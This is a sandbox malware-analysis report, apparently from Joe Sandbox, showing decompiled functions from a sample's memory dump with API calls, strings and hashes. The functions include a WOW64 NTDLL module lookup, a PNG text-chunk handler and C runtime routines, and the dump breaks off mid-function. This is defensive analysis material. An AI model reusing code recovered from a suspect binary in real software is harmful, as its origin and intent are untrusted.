Opcode ID: 0b6cc81153bcc054e30cac0df21e485a450e53f2384d9080f08d01cf57bfb4ae
Instruction ID: 0168c1c26ac1bf4afbec4bd5d42946b36ad363046c0d3c460536adfc3ea4f504
Opcode Fuzzy Hash: 0b6cc81153bcc054e30cac0df21e485a450e53f2384d9080f08d01cf57bfb4ae
Instruction Fuzzy Hash: 8211B2B1980214AEC750EF28AE0AA8A36E8B709314F014237E516F22D1D7B865508FAD

Uniqueness

Uniqueness Score: -1,00%

Function 004028C5, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004028C5(signed int _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v0;
				long _v4;
				char _v8;
				signed int _v12;
				long _v20;
				long _v24;
				void* _t37;
				intOrPtr* _t40;
				intOrPtr* _t41;
				char* _t42;
				CHAR* _t48;
				long _t52;
				void* _t53;
				void* _t55;

				_v12 = 2;
				E004022E3(_a4, 0, 0,  &_v8);
				_t52 = _v24;
				_v20 = _t52;
				_t55 = VirtualAlloc(0, _t52, 0x3000, 4);
				if(_t55 == 0) {
					L15:
					_v12 = 8;
					L16:
					if(_t55 != 0) {
						VirtualFree(_t55, 0, 0x8000);
					}
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t37 = E004022E3(_a4, _t55, _t52,  &_v8);
					_t52 = _v24;
					if(_t37 != 0 || _v4 >= _t52) {
						break;
					}
					_v4 = _t52;
					VirtualFree(_t55, 0, 0x8000);
					_t55 = VirtualAlloc(0, _t52, 0x3000, 4);
					if(_t55 != 0) {
						continue;
					}
					break;
				}
				if(_t55 == 0 || _v4 < _t52) {
					goto L15;
				} else {
					_a4 = _a4 & 0x00000000;
					_t14 = _t55 + 8; // 0x8
					_t53 = _t14;
					if( *_t55 <= 0) {
						goto L16;
					}
					while(1) {
						_t48 = ( *(_t53 + 0x1e) & 0x0000ffff) + _t53 + 0x20;
						if(lstrcmpiA(_t48, ?str?) == 0) {
							break;
						}
						_t42 = StrChrA(_t48, 0x2e);
						if(_t42 == 0) {
							L11:
							_t53 = _t53 + 0x120;
							_v0 = _v0 + 1;
							if(_v0 <  *_t55) {
								continue;
							}
							goto L16;
						}
						 *_t42 = 0;
						if(lstrcmpiA(_t48, ?str?) == 0) {
							break;
						}
						goto L11;
					}
					_t40 = _a8;
					_v12 = _v12 & 0x00000000;
					 *_t40 =  *((intOrPtr*)(_t53 + 8));
					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t53 + 0xc));
					_t41 = _a12;
					if(_t41 != 0) {
						 *_t41 =  *((intOrPtr*)(_t53 + 0x10));
					}
					goto L16;
				}
			}

0x004028d9
0x004028e1
0x004028e6
0x004028fa
0x00402900
0x00402904
0x004029d0
0x004029d0
0x004029d8
0x004029da
0x004029e4
0x004029e4
0x004029f5
0x00000000
0x00000000
0x00000000
0x0040290a
0x0040290a
0x00402915
0x0040291c
0x00402920
0x00000000
0x00000000
0x00402930
0x00402934
0x00402942
0x00402946
0x00000000
0x00000000
0x00000000
0x00402946
0x0040294a
0x00000000
0x00402956
0x00402956
0x0040295e
0x0040295e
0x00402961
0x00000000
0x00000000
0x00402969
0x0040296d
0x0040297b
0x00000000
0x00000000
0x00402980
0x00402988
0x00402999
0x00402999
0x0040299f
0x004029a9
0x00000000
0x00000000
0x00000000
0x004029ab
0x00402990
0x00402997
0x00000000
0x00000000
0x00000000
0x00402997
0x004029b0
0x004029b4
0x004029b9
0x004029be
0x004029c1
0x004029c7
0x004029cc
0x004029cc
0x00000000
0x004029c7

APIs

Part of subcall function 004022E3: GetModuleHandleA.KERNEL32(NTDLL.DLL,00000318,00000000,00000000), ref: 004022FB
Part of subcall function 004022E3: GetProcAddress.KERNEL32(00000000,ZwWow64QueryInformationProcess64), ref: 00402307

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 004028FE
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004029E4

Part of subcall function 004022E3: StrRChrA.SHLWAPI(00000018,00000000,0000005C), ref: 0040248D

VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,00000000), ref: 00402934
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00402940
lstrcmpiA.KERNEL32(?,NTDLL.DLL,?,00000000,00000000,00000000), ref: 00402977
StrChrA.SHLWAPI(?,0000002E), ref: 00402980
lstrcmpiA.KERNEL32(?,NTDLL.DLL), ref: 00402993

Strings

NTDLL.DLL, xrefs: 00402971, 0040298A

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressHandleModuleProc
String ID: NTDLL.DLL
API String ID: 1517968515-1613819793
Opcode ID: 22ef533a1612eb1eb53446884fe664fd51b5b8c8744b9c8823e26d1189006216
Instruction ID: d30303099b5cf2ee6d77ae9c71ec4b22925e4e0031191f98f692206028fa525b
Opcode Fuzzy Hash: 22ef533a1612eb1eb53446884fe664fd51b5b8c8744b9c8823e26d1189006216
Instruction Fuzzy Hash: 86317FB1605715ABD3208F11CE48F2BBBE8FB85751F00052AF984B72D1C7B8D845CBAA

Uniqueness

Uniqueness Score: -1,00%

Function 00425380, Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 394
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00425380(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr* _v36;
				char _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				char _v49;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr _v64;
				char _v65;
				intOrPtr _v72;
				intOrPtr* _v76;
				intOrPtr _v80;
				char _v81;
				intOrPtr _v88;
				intOrPtr* _v92;
				intOrPtr _v96;
				char _v97;
				intOrPtr _v104;
				intOrPtr _t293;
				intOrPtr _t353;
				void* _t496;
				void* _t497;

				if(_a4 == 0 || _a8 == 0 || _a16 <= 0 || _a12 == 0) {
					return 0;
				} else {
					if(_a16 <=  *(_a8 + 0x84) -  *(_a8 + 0x80)) {
						L14:
						_v8 = 0;
						while(_v8 < _a16) {
							_v36 =  *(_a8 + 0x80) * 0x1c +  *((intOrPtr*)(_a8 + 0x88));
							if( *((intOrPtr*)(_a12 + 4 + _v8 * 0x1c)) != 0) {
								if( *((intOrPtr*)(_a12 + _v8 * 0x1c)) < 0xffffffff ||  *((intOrPtr*)(_a12 + _v8 * 0x1c)) >= 3) {
									E0041B9E0(_a4, "text compression mode is out of range", 1);
									_t496 = _t496 + 0xc;
									goto L15;
								} else {
									_v44 =  *((intOrPtr*)(_a12 + 4 + _v8 * 0x1c));
									_v48 = _v44 + 1;
									do {
										_v49 =  *_v44;
										_v44 = _v44 + 1;
									} while (_v49 != 0);
									_v56 = _v44 - _v48;
									_v28 = _v56;
									if( *((intOrPtr*)(_a12 + _v8 * 0x1c)) > 0) {
										if( *((intOrPtr*)(_a12 + 0x14 + _v8 * 0x1c)) == 0) {
											_v32 = 0;
											L31:
											if( *((intOrPtr*)(_a12 + 0x18 + _v8 * 0x1c)) == 0) {
												_v40 = 0;
												L36:
												if( *((intOrPtr*)(_a12 + 8 + _v8 * 0x1c)) == 0 ||  *((char*)( *((intOrPtr*)(_a12 + 8 + _v8 * 0x1c)))) == 0) {
													_v24 = 0;
													if( *((intOrPtr*)(_a12 + _v8 * 0x1c)) <= 0) {
														 *_v36 = 0xffffffff;
													} else {
														 *_v36 = 1;
													}
													goto L45;
												} else {
													_v92 =  *((intOrPtr*)(_a12 + 8 + _v8 * 0x1c));
													_v96 = _v92 + 1;
													do {
														_v97 =  *_v92;
														_v92 = _v92 + 1;
													} while (_v97 != 0);
													_v104 = _v92 - _v96;
													_v24 = _v104;
													 *_v36 =  *((intOrPtr*)(_a12 + _v8 * 0x1c));
													L45:
													_t174 = _v40 + 4; // 0x4
													_t293 = E00424430(_a4, _v28 + _v24 + _v32 + _t174);
													_t497 = _t496 + 8;
													 *((intOrPtr*)(_v36 + 4)) = _t293;
													if( *((intOrPtr*)(_v36 + 4)) != 0) {
														L00433F90( *((intOrPtr*)(_v36 + 4)),  *((intOrPtr*)(_a12 + 4 + _v8 * 0x1c)), _v28);
														_t496 = _t497 + 0xc;
														 *((char*)( *((intOrPtr*)(_v36 + 4)) + _v28)) = 0;
														if( *((intOrPtr*)(_a12 + _v8 * 0x1c)) <= 0) {
															 *((intOrPtr*)(_v36 + 0x14)) = 0;
															 *((intOrPtr*)(_v36 + 0x18)) = 0;
															_t246 = _v28 + 1; // 0x1
															 *((intOrPtr*)(_v36 + 8)) =  *((intOrPtr*)(_v36 + 4)) + _t246;
														} else {
															_t199 = _v28 + 1; // 0x1
															 *((intOrPtr*)(_v36 + 0x14)) =  *((intOrPtr*)(_v36 + 4)) + _t199;
															L00433F90( *((intOrPtr*)(_v36 + 0x14)),  *((intOrPtr*)(_a12 + 0x14 + _v8 * 0x1c)), _v32);
															 *((char*)( *((intOrPtr*)(_v36 + 0x14)) + _v32)) = 0;
															_t217 = _v32 + 1; // 0x1
															 *((intOrPtr*)(_v36 + 0x18)) =  *((intOrPtr*)(_v36 + 0x14)) + _t217;
															L00433F90( *((intOrPtr*)(_v36 + 0x18)),  *((intOrPtr*)(_a12 + 0x18 + _v8 * 0x1c)), _v40);
															_t496 = _t496 + 0x18;
															 *((char*)( *((intOrPtr*)(_v36 + 0x18)) + _v40)) = 0;
															_t235 = _v40 + 1; // 0x1
															 *((intOrPtr*)(_v36 + 8)) =  *((intOrPtr*)(_v36 + 0x18)) + _t235;
														}
														if(_v24 != 0) {
															L00433F90( *((intOrPtr*)(_v36 + 8)),  *((intOrPtr*)(_a12 + 8 + _v8 * 0x1c)), _v24);
															_t496 = _t496 + 0xc;
														}
														 *((char*)( *((intOrPtr*)(_v36 + 8)) + _v24)) = 0;
														if( *_v36 <= 0) {
															 *((intOrPtr*)(_v36 + 0xc)) = _v24;
															 *((intOrPtr*)(_v36 + 0x10)) = 0;
														} else {
															 *((intOrPtr*)(_v36 + 0xc)) = 0;
															 *((intOrPtr*)(_v36 + 0x10)) = _v24;
														}
														 *(_a8 + 0x80) =  *(_a8 + 0x80) + 1;
														L15:
														_v8 = _v8 + 1;
														continue;
													}
													E0041B9E0(_a4, "text chunk: out of memory", 1);
													return 1;
												}
											}
											_v76 =  *((intOrPtr*)(_a12 + 0x18 + _v8 * 0x1c));
											_v80 = _v76 + 1;
											do {
												_v81 =  *_v76;
												_v76 = _v76 + 1;
											} while (_v81 != 0);
											_v88 = _v76 - _v80;
											_v40 = _v88;
											goto L36;
										}
										_v60 =  *((intOrPtr*)(_a12 + 0x14 + _v8 * 0x1c));
										_v64 = _v60 + 1;
										do {
											_v65 =  *_v60;
											_v60 = _v60 + 1;
										} while (_v65 != 0);
										_v72 = _v60 - _v64;
										_v32 = _v72;
										goto L31;
									}
									_v32 = 0;
									_v40 = 0;
									goto L36;
								}
							}
							goto L15;
						}
						return 0;
					}
					_v16 =  *(_a8 + 0x80);
					_v12 = 0;
					_v20 = _v16;
					if(_a16 <= 0x7fffffff - _v20) {
						_v20 = _v20 + _a16;
						if(_v20 >= 0x7ffffff7) {
							_v20 = 0x7fffffff;
						} else {
							_v20 = _v20 + 0x00000008 & 0xfffffff8;
						}
						_t353 = E00424500(_a4, _a4,  *((intOrPtr*)(_a8 + 0x88)), _v16, _v20 - _v16, 0x1c);
						_t496 = _t496 + 0x14;
						_v12 = _t353;
					}
					if(_v12 != 0) {
						E00424630(_a8, _a4,  *((intOrPtr*)(_a8 + 0x88)));
						_t496 = _t496 + 8;
						 *((intOrPtr*)(_a8 + 0x88)) = _v12;
						 *(_a8 + 0xf4) =  *(_a8 + 0xf4) | 0x00004000;
						 *(_a8 + 0x84) = _v20;
						goto L14;
					} else {
						E0041B9E0(_a4, "too many text chunks", 1);
						return 1;
					}
				}
			}

0x0042538a
0x00000000
0x004253a5
0x004253ba
0x0042549b
0x0042549b
0x004254ad
0x004254ce
0x004254df
0x004254f0
0x0042550c
0x00425511
0x00000000
0x00425516
0x00425523
0x0042552c
0x0042552f
0x00425534
0x00425537
0x0042553b
0x00425547
0x0042554d
0x0042555d
0x00425580
0x004255be
0x004255c5
0x004255d3
0x00425611
0x00425618
0x00425626
0x0042563c
0x00425650
0x00425660
0x00425652
0x00425655
0x00425655
0x00000000
0x00425668
0x00425675
0x0042567e
0x00425681
0x00425686
0x00425689
0x0042568d
0x00425699
0x0042569f
0x004256b1
0x004256b3
0x004256bf
0x004256c8
0x004256cd
0x004256d3
0x004256dd
0x00425715
0x0042571a
0x00425726
0x00425737
0x004257d7
0x004257e1
0x004257f1
0x004257f8
0x0042573d
0x00425746
0x0042574d
0x00425769
0x0042577a
0x00425787
0x0042578e
0x004257aa
0x004257af
0x004257bb
0x004257c8
0x004257cf
0x004257cf
0x004257ff
0x0042581a
0x0042581f
0x0042581f
0x0042582b
0x00425835
0x00425852
0x00425858
0x00425837
0x0042583a
0x00425847
0x00425847
0x0042586e
0x004254a4
0x004254aa
0x00000000
0x004254aa
0x004256ea
0x00000000
0x004256f2
0x00425626
0x004255e2
0x004255eb
0x004255ee
0x004255f3
0x004255f6
0x004255fa
0x00425606
0x0042560c
0x00000000
0x0042560c
0x0042558f
0x00425598
0x0042559b
0x004255a0
0x004255a3
0x004255a7
0x004255b3
0x004255b9
0x00000000
0x004255b9
0x0042555f
0x00425566
0x00000000
0x00425566
0x004254f0
0x00000000
0x004254e1
0x00000000
0x00425879
0x004253c9
0x004253cc
0x004253d6
0x004253e4
0x004253ec
0x004253f6
0x00425406
0x004253f8
0x00425401
0x00425401
0x00425428
0x0042542d
0x00425430
0x00425430
0x00425437
0x00425464
0x00425469
0x00425472
0x00425489
0x00425495
0x00000000
0x00425439
0x00425444
0x00000000
0x0042544c
0x00425437

APIs

_memmove.LIBCMT ref: 00425715
_memmove.LIBCMT ref: 00425769
_memmove.LIBCMT ref: 004257AA
_memmove.LIBCMT ref: 0042581A

Strings

text compression mode is out of range, xrefs: 00425503
too many text chunks, xrefs: 0042543B
text chunk: out of memory, xrefs: 004256E1

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: text chunk: out of memory$text compression mode is out of range$too many text chunks
API String ID: 4104443479-3976983143
Opcode ID: 477e7b7d05d174136ed37eb8b9f9740ec8626440d74fcba50e36deee4ffe1466
Instruction ID: fd56c743ca659ffb853dbd91b8c232beb06c56033a44ea09318ffdfaf6436c8b
Opcode Fuzzy Hash: 477e7b7d05d174136ed37eb8b9f9740ec8626440d74fcba50e36deee4ffe1466
Instruction Fuzzy Hash: 9312FC74A00659DFCB08CF98D590AEEBBB2FF98304F648159E815AB396C734E941CF94

Uniqueness

Uniqueness Score: -1,00%

Function 00408E6A, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

____lc_codepage_func.LIBCMT ref: 00408E6E
__calloc_crt.LIBCMT ref: 00408E7F

Part of subcall function 004374B4: __calloc_impl.LIBCMT ref: 004374C3
Part of subcall function 004374B4: Sleep.KERNEL32(00000000), ref: 004374DA

___pctype_func.LIBCMT ref: 00408E92
_memmove.LIBCMT ref: 00408E9B
___pctype_func.LIBCMT ref: 00408EAC
____lc_locale_name_func.LIBCMT ref: 00408EB8

Strings

@uF, xrefs: 00408E73

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ___pctype_func$Sleep____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
String ID: @uF
API String ID: 284940700-1110195652
Opcode ID: 69d4a10a8a493172d86988132b48de11dd111128583ea2feadf8ad7bf99de7ac
Instruction ID: b4a08140c65fdcf4e9d06c6685cd9e7ded27629191fed33372740e4da255504b
Opcode Fuzzy Hash: 69d4a10a8a493172d86988132b48de11dd111128583ea2feadf8ad7bf99de7ac
Instruction Fuzzy Hash: BBF0C8715047026AD7106F66D80770777D49F04714F10C42FF49CD7682DB7CE4448B98

Uniqueness

Uniqueness Score: -1,00%

Function 004446EB, Relevance: 12.1, APIs: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E004446EB(void* __ebx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t51;
				signed int _t54;
				signed int _t62;
				signed int _t76;
				signed int _t81;
				signed int _t89;
				signed int _t91;
				void* _t96;
				void* _t97;

				_t97 = __eflags;
				_t87 = __edx;
				_push(0x18);
				_push(0x467cc8);
				E004391D0(__ebx, __edi, __esi);
				_t91 = __esi | 0xffffffff;
				 *(_t96 - 0x1c) = _t91;
				 *(_t96 - 0x24) =  *(_t96 - 0x24) & 0x00000000;
				_push(0xb);
				_t51 = L00435E61(__ebx, __edx, __edi, _t91, _t97);
				if(_t51 != 0) {
					L00435DD9(__edx, 0xb);
					 *(_t96 - 4) =  *(_t96 - 4) & 0x00000000;
					_t76 = 0;
					__eflags = 0;
					while(1) {
						 *(_t96 - 0x28) = _t76;
						__eflags = _t76 - 0x40;
						if(_t76 >= 0x40) {
							break;
						}
						_t89 =  *(0x46c2a0 + _t76 * 4);
						__eflags = _t89;
						if(_t89 == 0) {
							_t81 = E004374B4(0x20, 0x40);
							 *(_t96 - 0x20) = _t81;
							__eflags = _t81;
							if(_t81 == 0) {
								break;
							}
							 *(0x46c2a0 + _t76 * 4) = _t81;
							 *0x46c954 =  *0x46c954 + 0x20;
							__eflags =  *0x46c954;
							while(1) {
								__eflags = _t81 -  *(0x46c2a0 + _t76 * 4) + 0x800;
								if(__eflags >= 0) {
									break;
								}
								 *((short*)(_t81 + 4)) = 0xa00;
								 *_t81 =  *_t81 | 0xffffffff;
								 *(_t81 + 8) =  *(_t81 + 8) & 0x00000000;
								_t81 = _t81 + 0x40;
								 *(_t96 - 0x20) = _t81;
							}
							_t91 = _t76 << 5;
							 *(_t96 - 0x1c) = _t91;
							 *((char*)( *((intOrPtr*)(0x46c2a0 + (_t91 >> 5) * 4)) + ((_t91 & 0x0000001f) << 6) + 4)) = 1;
							_push(_t91);
							_t62 = E0044465F(_t76, _t87, _t89, _t91, __eflags);
							__eflags = _t62;
							if(_t62 == 0) {
								_t91 = _t91 | 0xffffffff;
								__eflags = _t91;
								 *(_t96 - 0x1c) = _t91;
							}
							break;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							 *(_t96 - 0x20) = _t89;
							__eflags = _t89 -  *(0x46c2a0 + _t76 * 4) + 0x800;
							if(_t89 >=  *(0x46c2a0 + _t76 * 4) + 0x800) {
								break;
							}
							__eflags =  *(_t89 + 4) & 0x00000001;
							if(( *(_t89 + 4) & 0x00000001) != 0) {
								L14:
								_t89 = _t89 + 0x40;
								continue;
							}
							__eflags =  *(_t89 + 8);
							if( *(_t89 + 8) == 0) {
								L00435DD9(_t87, 0xa);
								 *(_t96 - 4) = 1;
								__eflags =  *(_t89 + 8);
								if( *(_t89 + 8) == 0) {
									_t18 = _t89 + 0xc; // 0x8000000c
									InitializeCriticalSectionAndSpinCount(_t18, 0xfa0);
									_t19 = _t89 + 8;
									 *_t19 =  *(_t89 + 8) + 1;
									__eflags =  *_t19;
								}
								_t21 = _t96 - 4;
								 *_t21 =  *(_t96 - 4) & 0x00000000;
								__eflags =  *_t21;
								E004447BF();
							}
							__eflags =  *(_t96 - 0x24);
							if( *(_t96 - 0x24) == 0) {
								_t24 = _t89 + 0xc; // 0x8000000c
								EnterCriticalSection(_t24);
								__eflags =  *(_t89 + 4) & 0x00000001;
								if(( *(_t89 + 4) & 0x00000001) == 0) {
									__eflags =  *(_t96 - 0x24);
									if( *(_t96 - 0x24) != 0) {
										goto L14;
									}
									 *(_t89 + 4) = 1;
									 *_t89 =  *_t89 | 0xffffffff;
									_t91 = (_t89 -  *(0x46c2a0 + _t76 * 4) >> 6) + (_t76 << 5);
									__eflags = _t91;
									 *(_t96 - 0x1c) = _t91;
									break;
								}
								_t28 = _t89 + 0xc; // 0x8000000c
								LeaveCriticalSection(_t28);
							}
							goto L14;
						}
						__eflags = _t91 - 0xffffffff;
						if(_t91 != 0xffffffff) {
							break;
						}
						_t76 = _t76 + 1;
					}
					 *(_t96 - 4) = 0xfffffffe;
					E00444887();
					_t54 = _t91;
					L26:
					return E00439215(_t54);
				}
				_t54 = _t51 | _t91;
				goto L26;
			}

0x004446eb
0x004446eb
0x004446eb
0x004446ed
0x004446f2
0x004446f7
0x004446fa
0x004446fd
0x00444701
0x00444703
0x0044470b
0x00444716
0x0044471c
0x00444720
0x00444720
0x00444722
0x00444722
0x00444725
0x00444728
0x00000000
0x00000000
0x0044472e
0x00444735
0x00444737
0x00444802
0x00444804
0x00444807
0x00444809
0x00000000
0x00000000
0x0044480b
0x00444812
0x00444812
0x00444819
0x00444825
0x00444827
0x00000000
0x00000000
0x00444829
0x0044482f
0x00444832
0x00444836
0x00444839
0x00444839
0x00444840
0x00444843
0x0044485a
0x0044485f
0x00444860
0x00444866
0x00444868
0x0044486a
0x0044486a
0x0044486d
0x0044486d
0x00000000
0x00000000
0x00000000
0x00000000
0x0044473d
0x0044473d
0x0044473d
0x0044474c
0x0044474e
0x00000000
0x00000000
0x00444754
0x00444758
0x004447b1
0x004447b1
0x00000000
0x004447b1
0x0044475a
0x0044475e
0x00444762
0x00444768
0x0044476f
0x00444773
0x0044477a
0x0044477e
0x00444784
0x00444784
0x00444784
0x00444784
0x00444787
0x00444787
0x00444787
0x0044478b
0x0044478b
0x00444793
0x00444795
0x00444797
0x0044479b
0x004447a1
0x004447a5
0x004447cb
0x004447cd
0x00000000
0x00000000
0x004447cf
0x004447d3
0x004447e7
0x004447e7
0x004447e9
0x00000000
0x004447e9
0x004447a7
0x004447ab
0x004447ab
0x00000000
0x00444795
0x004447ec
0x004447ef
0x00000000
0x00000000
0x004447f1
0x004447f1
0x00444870
0x00444877
0x0044487c
0x0044487e
0x00444883
0x00444883
0x0044470d
0x00000000

APIs

__mtinitlocknum.LIBCMT ref: 00444703

Part of subcall function 00435E61: __FF_MSGBANNER.LIBCMT ref: 00435E76
Part of subcall function 00435E61: __NMSG_WRITE.LIBCMT ref: 00435E7D
Part of subcall function 00435E61: __malloc_crt.LIBCMT ref: 00435E9D

__lock.LIBCMT ref: 00444716
__lock.LIBCMT ref: 00444762
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00467CC8,00000018,00449930,?,00000000,00000109), ref: 0044477E
EnterCriticalSection.KERNEL32(8000000C,00467CC8,00000018,00449930,?,00000000,00000109), ref: 0044479B
LeaveCriticalSection.KERNEL32(8000000C), ref: 004447AB

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: e63d1ce3e6787ff9868a7dec06783c8c3966e04fd3ec96a17f61e7fc226d9589
Instruction ID: 083e75d59ec96e073dd945b722a8f2e8acb285a42c323718a0a8b027b418296f
Opcode Fuzzy Hash: e63d1ce3e6787ff9868a7dec06783c8c3966e04fd3ec96a17f61e7fc226d9589
Instruction Fuzzy Hash: 94412A75D006419BFB109FA9DC8476DB7A0AF46329F20822EE465973D0D7BC9802CB8D

Uniqueness

Uniqueness Score: -1,00%

Function 0043D056, Relevance: 10.7, APIs: 7, Instructions: 244
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0043D056(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, char _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, signed int* _a24) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v180;
				char _v468;
				signed int _v472;
				signed int* _v476;
				signed short _v480;
				short* _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				signed int* _v496;
				signed int* _v500;
				signed int _v520;
				signed int _t86;
				void* _t89;
				signed int _t91;
				signed int _t93;
				signed int _t100;
				signed int _t105;
				signed int _t115;
				intOrPtr _t118;
				signed int _t120;
				signed int _t121;
				signed int _t124;
				signed int _t125;
				signed int _t128;
				signed short _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t135;
				intOrPtr _t137;
				signed int _t139;
				char* _t140;
				signed int _t141;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t151;
				signed int _t153;
				signed int _t156;
				void* _t157;
				intOrPtr _t172;
				void* _t177;
				void* _t186;
				signed int* _t188;
				intOrPtr* _t189;
				signed int _t190;
				signed int _t192;
				signed int _t196;
				void* _t197;
				signed int* _t200;
				void* _t201;
				intOrPtr _t203;
				void* _t204;
				signed int _t206;
				signed int _t210;
				void* _t211;
				void* _t212;
				void* _t216;

				_t186 = __edx;
				_t206 = _t210;
				_t211 = _t210 - 0x1f0;
				_t86 =  *0x469acc; // 0x6f159cef
				_v8 = _t86 ^ _t206;
				_push(__ebx);
				_t153 = _a16;
				_push(__esi);
				_t200 = _a4;
				_push(__edi);
				_t188 = _a24;
				_v496 = _a8;
				_v500 = _t188;
				_t89 = L0043CC0F(_t188, __eflags);
				_t8 = _t89 + 0xb4; // 0xb4
				_v476 = _t8;
				_t10 = _t89 + 0xb8; // 0xb8
				_v484 = _t10;
				_t12 = _t89 + 0x1be; // 0x1be
				_v472 = _t12;
				_v480 = 0;
				if(_t200 != 0) {
					_v492 = _t89 + 0x2ec;
					_t91 = E004442A7(_t153, _a20, _t89 + 0x2ec, 0x55);
					_t212 = _t211 + 0x10;
					__eflags = _t91;
					if(_t91 != 0) {
						L42:
						__eflags = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						goto L43;
					} else {
						__eflags =  *_t200 - 0x43;
						if( *_t200 != 0x43) {
							L10:
							_t118 = L00437E2A(_t200);
							_v488 = _t118;
							__eflags = _t118 - 0x83;
							if(_t118 >= 0x83) {
								L13:
								_t192 =  *0x46c9b4; // 0x182c9e40
								asm("sbb edi, edi");
								_t196 =  !( ~(_t192 ^  *0x469acc)) & 0x00000001;
								_t120 = L0043CF00(_t153, _t186,  &_v468, _t200);
								_pop(_t177);
								__eflags = _t120;
								if(_t120 != 0) {
									_t188 = _v476;
									goto L22;
								} else {
									_t140 =  &_v468;
									_push(_t140);
									__eflags = _t196;
									_t188 = _v476;
									_push(_t188);
									_push(_t140);
									if(__eflags == 0) {
										_t141 = E004466C2(_t177, _t186, __eflags);
									} else {
										_t141 = L00446F0E(_t186, __eflags);
									}
									_t212 = _t212 + 0xc;
									__eflags = _t141;
									if(_t141 == 0) {
										L22:
										_t121 = E0043822C(_t200);
										__eflags = _t121;
										if(_t121 == 0) {
											_t124 = E004442A7(_v492, 0x55, _t153, L00437E2A(_t153) + 1);
											_t212 = _t212 + 0x14;
											__eflags = _t124;
											if(_t124 != 0) {
												goto L42;
											} else {
												goto L1;
											}
										} else {
											_t128 = E004381D2(_t200, 0x20001004,  &_v480, 2);
											_t216 = _t212 + 0x10;
											__eflags = _t128;
											if(_t128 == 0) {
												L25:
												_t129 = GetACP();
												_v480 = _t129;
											} else {
												_t129 = _v480;
												__eflags = _t129;
												if(_t129 == 0) {
													goto L25;
												}
											}
											 *_t188 = _t129 & 0x0000ffff;
											_t188 = _v488 + 1;
											_t131 = E004442A7(_v472, 0x83, _t200, _t188);
											_t212 = _t216 + 0x10;
											__eflags = _t131;
											if(_t131 != 0) {
												goto L42;
											} else {
												_t132 = E004442A7(_t153, _a20, _t200, _t188);
												_t212 = _t212 + 0x10;
												__eflags = _t132;
												if(_t132 != 0) {
													goto L42;
												} else {
													_t133 = E004442A7(_v492, 0x55, _t200, _t188);
													_t212 = _t212 + 0x10;
													__eflags = _t133;
													if(_t133 != 0) {
														goto L42;
													} else {
														_t188 = 0x83;
														goto L30;
													}
												}
											}
										}
									} else {
